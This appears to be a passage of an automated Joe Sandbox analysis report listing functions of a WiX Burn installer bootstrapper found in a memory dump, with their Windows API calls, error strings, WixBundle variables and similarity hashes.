GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D55217

Part of subcall function 00D904F8: InitializeCriticalSection.KERNEL32(00DBB5FC,?,00D55223,00000000,?,?,?,?,?,?), ref: 00D9050F

Part of subcall function 00D5120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,00D5523F,00000000,?), ref: 00D51248
Part of subcall function 00D5120A: GetLastError.KERNEL32(?,?,?,00D5523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00D51252

CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00D55285

Part of subcall function 00D90E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00D90E28

GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00D55317
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00D55321
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D5558E

Strings

Failed to initialize Regutil., xrefs: 00D552C9
Failed to initialize engine state., xrefs: 00D5526C
Failed to initialize XML util., xrefs: 00D552F9
Failed to run per-machine mode., xrefs: 00D5546C
3.11.1.2318, xrefs: 00D55384
engine.cpp, xrefs: 00D55345
Failed to run RunOnce mode., xrefs: 00D5541C
Failed to initialize COM., xrefs: 00D55291
Failed to initialize Cryputil., xrefs: 00D552A6
Failed to parse command line., xrefs: 00D55245
Failed to initialize core., xrefs: 00D553C3
Failed to get OS info., xrefs: 00D5534F
Failed to run per-user mode., xrefs: 00D55494
Invalid run mode., xrefs: 00D553F9
Failed to initialize Wiutil., xrefs: 00D552E1
Failed to run untrusted mode., xrefs: 00D554B6
Failed to run embedded mode., xrefs: 00D55444

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
API String ID: 3262001429-510904028
Opcode ID: 0067c281280e1a74b611db128abf8ce6b65fcf50a329de89fb7fac61b0a4d748
Instruction ID: 13f27f235adfd37e4f762f00722c0a501be3f30adb98b7bd7a0c523d76d5579c
Opcode Fuzzy Hash: 0067c281280e1a74b611db128abf8ce6b65fcf50a329de89fb7fac61b0a4d748
Instruction Fuzzy Hash: 87B1D471D40629ABDF33AF64ED56BED7674AF04312F050196ED08A6244DB709E88CFB1

Function 00D6752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to set source process path variable., xrefs: 00D67709
WixBundleSourceProcessFolder, xrefs: 00D67734
Failed to set source process folder variable., xrefs: 00D67745
Failed to set original source variable., xrefs: 00D6776A
Failed to overwrite the %ls built-in variable., xrefs: 00D676BB
Failed to open manifest stream., xrefs: 00D675AB
Failed to get manifest stream from container., xrefs: 00D675CC
Failed to initialize variables., xrefs: 00D67571
Failed to extract bootstrapper application payloads., xrefs: 00D677EF
WixBundleUILevel, xrefs: 00D676D6, 00D676E7
WixBundleSourceProcessPath, xrefs: 00D676F8
Failed to load catalog files., xrefs: 00D6780F
Failed to get source process folder from path., xrefs: 00D67725
Failed to load manifest., xrefs: 00D675E8
Failed to parse command line., xrefs: 00D67667
Failed to initialize internal cache functionality., xrefs: 00D6779F
Failed to open attached UX container., xrefs: 00D6758E
Failed to get unique temporary folder for bootstrapper application., xrefs: 00D677CE
WixBundleElevated, xrefs: 00D676A5, 00D676B6
WixBundleOriginalSource, xrefs: 00D67759

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
API String ID: 32694325-1564579409
Opcode ID: de1c390c773b8b677b1fab41baf3ac56c8ffa42c2fe61501b7a48ac84f3e355b
Instruction ID: 89cb20fa91c5f917c7e4ece7fe0b9a9a30959ed74c7e846e20e656b15b1810fa
Opcode Fuzzy Hash: de1c390c773b8b677b1fab41baf3ac56c8ffa42c2fe61501b7a48ac84f3e355b
Instruction Fuzzy Hash: 86A18072A4461ABFDF129AA4CC85EEAB76CBB04704F040666F915F7141E770EA488BB0

Function 00D5762C Relevance: 34.9, APIs: 1, Strings: 22, Instructions: 420
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00D6756B,00D553BD,00000000,00D55445), ref: 00D5764C

Strings

WixBundleExecutePackageAction, xrefs: 00D57DF8
WixBundleSourceProcessFolder, xrefs: 00D57E9E
LogonUser, xrefs: 00D57882
Date, xrefs: 00D57770
$, xrefs: 00D57D49
InstallerVersion, xrefs: 00D57833
WixBundleUILevel, xrefs: 00D57EBE
WixBundleProviderKey, xrefs: 00D57E7E
WixBundleInstalled, xrefs: 00D57E2A
WixBundleSourceProcessPath, xrefs: 00D57E8E
#, xrefs: 00D576CB
WixBundleTag, xrefs: 00D57EAE
InstallerName, xrefs: 00D57812
Failed to add built-in variable: %ls., xrefs: 00D57F19
', xrefs: 00D578EB
0, xrefs: 00D57663
WixBundleElevated, xrefs: 00D57E46
WixBundleExecutePackageCacheFolder, xrefs: 00D57D98
WixBundleActiveParent, xrefs: 00D57E62
WixBundleVersion, xrefs: 00D57ECE
WixBundleForcedRestartPackage, xrefs: 00D57E14
WixBundleAction, xrefs: 00D57D76

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
API String ID: 32694325-3635313340
Opcode ID: 8a82e90156a5da02de4acc4b9c9a6e172736de51ff6bffe588a8f9db208d2cd1
Instruction ID: 94de529fdba80395786b87ebf2093442061c90f7f2018d5fa2d0781b7085e705
Opcode Fuzzy Hash: 8a82e90156a5da02de4acc4b9c9a6e172736de51ff6bffe588a8f9db208d2cd1
Instruction Fuzzy Hash: F63257B0D156299BDF65CF5AD9887CDFAB4BB48304F9091EED60CA7310C7B00A888F65

Function 00D682BA Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00D55489), ref: 00D68310

Part of subcall function 00D90879: OpenProcessToken.ADVAPI32(?,00000008,?,00D553BD,00000000,?,?,?,?,?,?,?,00D6769D,00000000), ref: 00D90897
Part of subcall function 00D90879: GetLastError.KERNEL32(?,?,?,?,?,?,?,00D6769D,00000000), ref: 00D908A1
Part of subcall function 00D90879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00D6769D,00000000), ref: 00D9092B

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00D68336
GetLastError.KERNEL32 ref: 00D68340
GetTempPathW.KERNEL32(00000104,?,00000000), ref: 00D683BD
GetLastError.KERNEL32 ref: 00D683C7
UuidCreate.RPCRT4(?), ref: 00D68406

Strings

Failed to create working folder guid., xrefs: 00D68413
Failed to concat Temp directory on windows path for working folder., xrefs: 00D683AD
Failed to get windows path for working folder., xrefs: 00D6836E
Failed to copy working folder path., xrefs: 00D6848B
%ls%ls\, xrefs: 00D68458
4Wu, xrefs: 00D683BD
Failed to append bundle id on to temp path for working folder., xrefs: 00D68470
Failed to get temp path for working folder., xrefs: 00D683F5
Failed to convert working folder guid into string., xrefs: 00D68446
Failed to ensure windows path for working folder ended in backslash., xrefs: 00D6838B
cache.cpp, xrefs: 00D68364, 00D683EB, 00D6843C
Temp\, xrefs: 00D68395

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
String ID: 4Wu$%ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
API String ID: 266130487-571614469
Opcode ID: 7938cdb97664bd125337689ba7349a4626940aff2f1958dbd4abe4f8b9b03449
Instruction ID: aa30861c47a410d7cf1e1ed258f5db335d0fa16232e9d817a736709da20bd5c3
Opcode Fuzzy Hash: 7938cdb97664bd125337689ba7349a4626940aff2f1958dbd4abe4f8b9b03449
Instruction Fuzzy Hash: 1F41F772E40325FBDB3096A49D0AF9A776CAB01B11F054266BE08F7240EE74ED0896F5

Function 00D710FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 00D7111D
CoUninitialize.COMBASE ref: 00D71398

Strings

Failed to reset begin operation event., xrefs: 00D71350
Failed to set operation complete event., xrefs: 00D712C4
Invalid operation for this state., xrefs: 00D7137C
<the>.cab, xrefs: 00D711BD
Failed to wait for begin operation event., xrefs: 00D71311
cabextract.cpp, xrefs: 00D71193, 00D712BA, 00D71307, 00D71346, 00D71372
Failed to extract all files from container, erf: %d:%X:%d, xrefs: 00D71279
Failed to initialize COM., xrefs: 00D71129
Failed to initialize cabinet.dll., xrefs: 00D7119F

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: InitializeUninitialize
String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 3442037557-1168358783
Opcode ID: d36c8899519075be9aaa912e35a9f584b4cc34cf25b3d08eddbd8fae825f84e7
Instruction ID: e6ff73b66f9f65d95f7a9f001ea8a4683f3908db854bdd9c9cdbed0df97c239d
Opcode Fuzzy Hash: d36c8899519075be9aaa912e35a9f584b4cc34cf25b3d08eddbd8fae825f84e7
Instruction Fuzzy Hash: 02512A3EA40271EB8F20579C8C0697B3A54DB05B70B26C366BD19FB292F615CD00D6FA

Function 00D542D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00D55266,?,?,00000000,?,?), ref: 00D54303
InitializeCriticalSection.KERNEL32(000000D0,?,?,00D55266,?,?,00000000,?,?), ref: 00D5430C
lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00D55266,?,?,00000000,?,?), ref: 00D54352
lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00D55266,?,?,00000000,?,?), ref: 00D5435C
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00D55266,?,?,00000000,?,?), ref: 00D54370
lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00D55266,?,?,00000000,?,?), ref: 00D54380
lstrlenW.KERNEL32(burn.filehandle.self,?,?,00D55266,?,?,00000000,?,?), ref: 00D543D0
lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00D55266,?,?,00000000,?,?), ref: 00D543DA
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00D55266,?,?,00000000,?,?), ref: 00D543EE
lstrlenW.KERNEL32(burn.filehandle.self,?,?,00D55266,?,?,00000000,?,?), ref: 00D543FE

Strings

Missing required parameter for switch: %ls, xrefs: 00D544A4
burn.filehandle.self, xrefs: 00D543CB, 00D543D3, 00D543D8, 00D543D9, 00D543F9, 00D544CB
engine.cpp, xrefs: 00D54495, 00D544C1
Failed to initialize engine section., xrefs: 00D54467
Failed to parse file handle: '%ls', xrefs: 00D54482
burn.filehandle.attached, xrefs: 00D5434D, 00D54355, 00D5435A, 00D5435B, 00D5437B, 00D5449F

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: lstrlen$CompareCriticalInitializeSectionString
String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
API String ID: 3039292287-3209860532
Opcode ID: 1f4f4461863c88fdcd26cc90067b3d429aa2d6b4c99dda379371d6bbd4e096f6
Instruction ID: b96b244db7b77c2f3a14e95f8d0928b3992f9f355629e18f0322e12ee7be9f78
Opcode Fuzzy Hash: 1f4f4461863c88fdcd26cc90067b3d429aa2d6b4c99dda379371d6bbd4e096f6
Instruction Fuzzy Hash: 6951C271A40215BFCF249B64EC86FAA776CEF04765F01011AFE54E7290DBB0A944CAB5

Function 00D6E7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsSetValue.KERNEL32(?,?), ref: 00D6E7FF
RegisterClassW.USER32(?), ref: 00D6E82B
GetLastError.KERNEL32 ref: 00D6E836
CreateWindowExW.USER32(00000080,00DA9E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 00D6E89D
GetLastError.KERNEL32 ref: 00D6E8A7
UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 00D6E945

Strings

Failed to register window., xrefs: 00D6E864
uithread.cpp, xrefs: 00D6E85A, 00D6E8CB
WixBurnMessageWindow, xrefs: 00D6E824, 00D6E940
Unexpected return value from message pump., xrefs: 00D6E930
Failed to create window., xrefs: 00D6E8D5

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
API String ID: 213125376-288575659
Opcode ID: 0fc5712b8c59257d24f3217679ac48fde630e202e55e29db245280e55e22d224
Instruction ID: 76a5f5a46e98e008ae0ced74f677938c8f7e62c5e27091a7c04e3741942dfbe2
Opcode Fuzzy Hash: 0fc5712b8c59257d24f3217679ac48fde630e202e55e29db245280e55e22d224
Instruction Fuzzy Hash: BD419376900225AFDB209BA5DD44ADEBFB8EF09760F154127F904EB250D730AD44CBB0

Function 00D5C28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,00D5C47F,00D55405,?,?,00D55445), ref: 00D5C2D6
GetLastError.KERNEL32(?,00D5C47F,00D55405,?,?,00D55445,00D55445,00000000,?,00000000), ref: 00D5C2E7
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,00D5C47F,00D55405,?,?,00D55445,00D55445,00000000,?), ref: 00D5C336
GetCurrentProcess.KERNEL32(000000FF,00000000,?,00D5C47F,00D55405,?,?,00D55445,00D55445,00000000,?,00000000), ref: 00D5C33C
DuplicateHandle.KERNELBASE(00000000,?,00D5C47F,00D55405,?,?,00D55445,00D55445,00000000,?,00000000), ref: 00D5C33F
GetLastError.KERNEL32(?,00D5C47F,00D55405,?,?,00D55445,00D55445,00000000,?,00000000), ref: 00D5C349
SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00D5C47F,00D55405,?,?,00D55445,00D55445,00000000,?,00000000), ref: 00D5C39B
GetLastError.KERNEL32(?,00D5C47F,00D55405,?,?,00D55445,00D55445,00000000,?,00000000), ref: 00D5C3A5

Strings

crypt32.dll, xrefs: 00D5C397
feclient.dll, xrefs: 00D5C398
Failed to duplicate handle to container: %ls, xrefs: 00D5C37A
Failed to move file pointer to container offset., xrefs: 00D5C3D3
Failed to open container., xrefs: 00D5C3F1
Failed to open file: %ls, xrefs: 00D5C318
container.cpp, xrefs: 00D5C30B, 00D5C36D, 00D5C3C9

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
API String ID: 2619879409-373955632
Opcode ID: b52105ea729276d6045e41f29a501c41970395c581fa170fd94c6ed25d33f6a6
Instruction ID: 58aae224c84ea0f3bbe4e6ef7e9a797927d6de5145783776ed0a2d8c8386c458
Opcode Fuzzy Hash: b52105ea729276d6045e41f29a501c41970395c581fa170fd94c6ed25d33f6a6
Instruction Fuzzy Hash: 5A41D476240305AFEF209F199D49E1B3AA5EB85761B26802AFD14EB241EB71D805DA70

Function 00D92AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D53838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00D53877
Part of subcall function 00D53838: GetLastError.KERNEL32 ref: 00D53881

Part of subcall function 00D94A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00D94A9D

GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00D92B41
GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00D92B61
GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00D92B81
GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00D92BA1
GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00D92BC1
GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00D92BE1
GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00D92C01

Strings

MsiGetProductInfoExW, xrefs: 00D92BB6
MsiGetPatchInfoExW, xrefs: 00D92B96
MsiSourceListAddSourceExW, xrefs: 00D92BF6
MsiDetermineApplicablePatchesW, xrefs: 00D92B56
MsiDeterminePatchSequenceW, xrefs: 00D92B36
Msi.dll, xrefs: 00D92B09
MsiSetExternalUIRecord, xrefs: 00D92BD6
MsiEnumProductsExW, xrefs: 00D92B76

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: AddressProc$ErrorLast$DirectorySystem
String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
API String ID: 2510051996-1735120554
Opcode ID: 134c134f646071cf0ad12ad69f9c76bacc71a6940009d1b27da97154287cd4af
Instruction ID: c7f600f54dff1f82a0fc3fe4e1be1ee66073c0c4356421b84dda8288e80dc831
Opcode Fuzzy Hash: 134c134f646071cf0ad12ad69f9c76bacc71a6940009d1b27da97154287cd4af
Instruction Fuzzy Hash: 173191B0941708EEDB129F61ED06BA97BA0F714769F04026BE804DA7B0E7F54C499F74

Function 00D9304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153libraryloadercomCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00D93609,00000000,?,00000000), ref: 00D93069
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00D7C025,?,00D55405,?,00000000,?), ref: 00D93075
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00D930B5
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D930C1
GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 00D930CC
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D930D6
CoCreateInstance.OLE32(00DBB6B8,00000000,00000001,00D9B818,?,?,?,?,?,?,?,?,?,?,?,00D7C025), ref: 00D93111
ExitProcess.KERNEL32 ref: 00D931C0

Strings

Wow64DisableWow64FsRedirection, xrefs: 00D930BB
Wow64RevertWow64FsRedirection, xrefs: 00D930CE
kernel32.dll, xrefs: 00D93059
Wow64EnableWow64FsRedirection, xrefs: 00D930C3
IsWow64Process, xrefs: 00D930AF
xmlutil.cpp, xrefs: 00D93099

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
API String ID: 2124981135-499589564
Opcode ID: a510100b86fab38dcb30f6bc2f9d269e10b8b338bc3bea06dcbed42243243d92
Instruction ID: 539ab3b080e1a1a5d0e45c3bb8b51d17869b78d97325edd2c134a353274f940d
Opcode Fuzzy Hash: a510100b86fab38dcb30f6bc2f9d269e10b8b338bc3bea06dcbed42243243d92
Instruction Fuzzy Hash: 01418135B01315ABDF24DFA88845BAEB7B4EF44710F15416AE906EB350DB71DE448BB0

Function 00D71741 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,00D5C3EB,?,00000000,?,00D5C47F), ref: 00D71778
GetLastError.KERNEL32(?,00D5C3EB,?,00000000,?,00D5C47F,00D55405,?,?,00D55445,00D55445,00000000,?,00000000), ref: 00D71781

Strings

wininet.dll, xrefs: 00D71757
Failed to create extraction thread., xrefs: 00D71841
Failed to create operation complete event., xrefs: 00D717F5
Failed to wait for operation complete., xrefs: 00D71854
Failed to copy file name., xrefs: 00D71763
cabextract.cpp, xrefs: 00D717A5, 00D717EB, 00D71837
Failed to create begin operation event., xrefs: 00D717AF

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
API String ID: 545576003-938279966
Opcode ID: 1e4f9f9aba6301a3d266d98a70fc88b981bdec99698bbd669462232c0ea5731d
